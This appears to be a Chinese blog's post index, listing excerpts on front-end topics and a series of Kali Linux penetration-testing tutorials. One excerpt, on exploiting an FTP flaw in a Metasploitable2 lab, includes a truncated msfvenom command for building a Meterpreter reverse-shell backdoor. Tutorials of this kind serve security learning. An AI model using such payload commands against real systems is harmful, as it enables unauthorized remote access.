摘要: 以目前的时代来说,微前端并不算是一个很新的概念了,微前端的本质就是大型应用的拆分与关联。在我刚开始学微前端的时候,就接触到了如下的概念:比如基座式微应用、自组织式微应用,或者微前端的实现方案比如:路由分发、iframe、应用微服务化、微件化、微应用化等等。如果你刚开始接触微前端的概念,想要学习微前端 阅读全文
posted @ 2024-12-12 15:07 Zaking 阅读(420) 评论(2) 推荐(1) 编辑
摘要: ——过去日子的回顾(这是个副标题) ——其实这是篇广告软文(这是个副副标题) 以下是一些牢骚和感悟,不感兴趣的可以滑倒最下面,嘻嘻。 每每回忆起从前,就感觉时间飞逝,真切的感受到了那种课本中描述的白驹过隙。和很多人发生的,经历的很多事情,就好像昨天一样,但是仔细的思索一番,早已时隔多年,恍然如昨。 阅读全文
posted @ 2023-10-27 17:28 Zaking 阅读(604) 评论(7) 推荐(6) 编辑
摘要: 说实话,我写完这个系列之后,或者说抄完这个系列之后,唯一的脑海里浮现的词叫做“惭愧”。如果你读过罗剑锋老师的《透视HTTP协议》的话,就能察觉到本系列越往后面的部分,几乎跟原文越像,嗯……因为后面的那些文章基本上都是抄的,甚至是一字不拉的复制过来的。 其实我一直想写一些有自己思想、感悟的东西。但是每 阅读全文
posted @ 2023-02-16 22:50 Zaking 阅读(163) 评论(0) 推荐(1) 编辑
摘要: 从vue2版本开始,vue-resource就不再被vue所维护和支持,官方也推荐使用axios,所以,从我使用axios至今,差不多有四五年了,这四五年的时间只能算是熟练应用,很多内部的实现和原理不清不楚,导致在开发的时候遇到问题,大多数情况都是凭借经验来“猜测”出答案,这就导致内心深处十分的空虚 阅读全文
posted @ 2022-03-15 14:17 Zaking 阅读(731) 评论(0) 推荐(1) 编辑
摘要: 哇,看了自己最近的一篇文章,已经刚好一年来,其实那时候刚刚接触Jest,啥也不会(虽然现在其实也一样不会,嘿嘿),就想记录下工作中遇到的一些问题。但是后来在持续的工作中才发现,那两篇文章写的其实是很有一些问题的。希望不会给大家带来误导,在某些特殊的情况下,确实可以解决描述中的问题,但是实际上,并没有 阅读全文
posted @ 2020-03-11 22:13 Zaking 阅读(220) 评论(0) 推荐(1) 编辑
摘要: 首先,有一点要声明,下面所有文章的所有内容的代码,都不是我一个人独立完成的,它们来自于一本叫做《学习JavaScript数据结构和算法》(第二版),人民邮电出版社出版的这本书。github代码地址是https://github.com/loiane/javascript-datastructures 阅读全文
posted @ 2018-05-10 20:37 Zaking 阅读(2195) 评论(0) 推荐(3) 编辑
摘要: Burp Suite是一款集成化的渗透测试工具,包含了很多功能,可以帮助我们快速完成对web应用程序的渗透测试和攻击。Burp Suite是由Java语言编写,因为Java是可以跨平台的,所以Burp Suite也是跨平台的,支持windows、linux、mac。 1、代理和浏览器设置 Burp 阅读全文
posted @ 2023-12-01 17:53 Zaking 阅读(267) 评论(0) 推荐(0) 编辑
摘要: 1、拒绝服务攻击 使用某些手段故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击。实际上拒绝服务攻击并不是一个攻击方式,它是一类具有相似特征的攻击方式的集合。拒绝服务攻击有以下分类: 1. 数据链路层的拒绝服务攻击 攻击目标:交换机 集线器:以前的内网都是用集线器,集线 阅读全文
posted @ 2023-12-01 16:47 Zaking 阅读(198) 评论(1) 推荐(0) 编辑
摘要: 1、字典文件 对密码进行破解的时候,一个字典文件是必不可少的,所谓的字典文件就是由大量词汇构成的文件。在kali Linux系统中字典文件的来源有: 使用字典工具自己生成字典文件 使用kali自带的字典文件,在/usr/share/wordlists目录下 从互联网上下载热门的字典 字典生成工具:C 阅读全文
posted @ 2023-12-01 16:10 Zaking 阅读(868) 评论(0) 推荐(0) 编辑
摘要: 1、网络嗅探:使用TCPDump分析网络数据 TCPDump是一款资深网络工作人员必备的工具。TCPDump是一款小巧的纯命令行工具,正是因为它的体积小巧,所以这款工具可以完美的运行在大多数路由器,防火墙以及Linux系统中。而且TCPDump现在有了Windows版本。 TCPDump的使用: t 阅读全文
posted @ 2023-12-01 09:38 Zaking 阅读(1019) 评论(0) 推荐(5) 编辑
摘要: 1、利用FTP漏洞并植入后门 实验靶机:Metasploitable2。 实践: 使用nmap扫描目标靶机 nmap -sV xxx.xxx.xxx.xxx(目标ip) 生成linux系统后门 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x 阅读全文
posted @ 2023-11-30 19:00 Zaking 阅读(220) 评论(0) 推荐(1) 编辑
摘要: 1、Nmap基础 Nmap是主机扫描工具,它的图形化界面是Zebmap,分布式框架是Dnmap,Nmap可以完成诸如:主机探测、端口扫描、版本检测、系统监测等。并且支持探测脚本的编写。 Nmap在实际应用中大概有如下场景: 通过对设备或防火墙的探测来审计它的安全性。 探测目标主机所开放的端口。 通过 阅读全文
posted @ 2023-11-30 09:45 Zaking 阅读(271) 评论(0) 推荐(1) 编辑
摘要: 1、Legion漏洞扫描分析工具 Legion是Sparta的一个分支,它是一个开源的、易于使用的、超级可扩展的、半自动的网络渗透测试框架。它是一款Kali Linux系统默认集成的Python GUI应用程序工具。Legion是一个Nmap、Nikto、Hydra等工具的集合,利用各个工具的优秀功 阅读全文
posted @ 2023-11-30 09:45 Zaking 阅读(1219) 评论(0) 推荐(2) 编辑
摘要: 一、Linux常用命令 首先,我们启动kali系统,然后点击这里的命令行工具。 就可以使用下面学习的命令了,另外,如果你有过计算机基础,那么Mac的terminal和Git的gitbash,都是可以练习大部分的linux命令的。下面我们就学习一些入门的基础命令 sudo,系统管理者的身份执行指令,也 阅读全文
posted @ 2023-11-29 21:33 Zaking 阅读(896) 评论(0) 推荐(1) 编辑
摘要: 一切的一切,希望你做一个正直的、心地善良的人。 1、虚拟机安装指南 常用的虚拟机有VMware和virtualbox。咱们使用VMware来安装虚拟机。 然后我们通过百度搜索VMware,找到下载方式下载VMware-workstation-16即可。 下载完成后,就跟安装一个普通的软件一样,下一步 阅读全文
posted @ 2023-11-29 14:47 Zaking 阅读(2418) 评论(1) 推荐(4) 编辑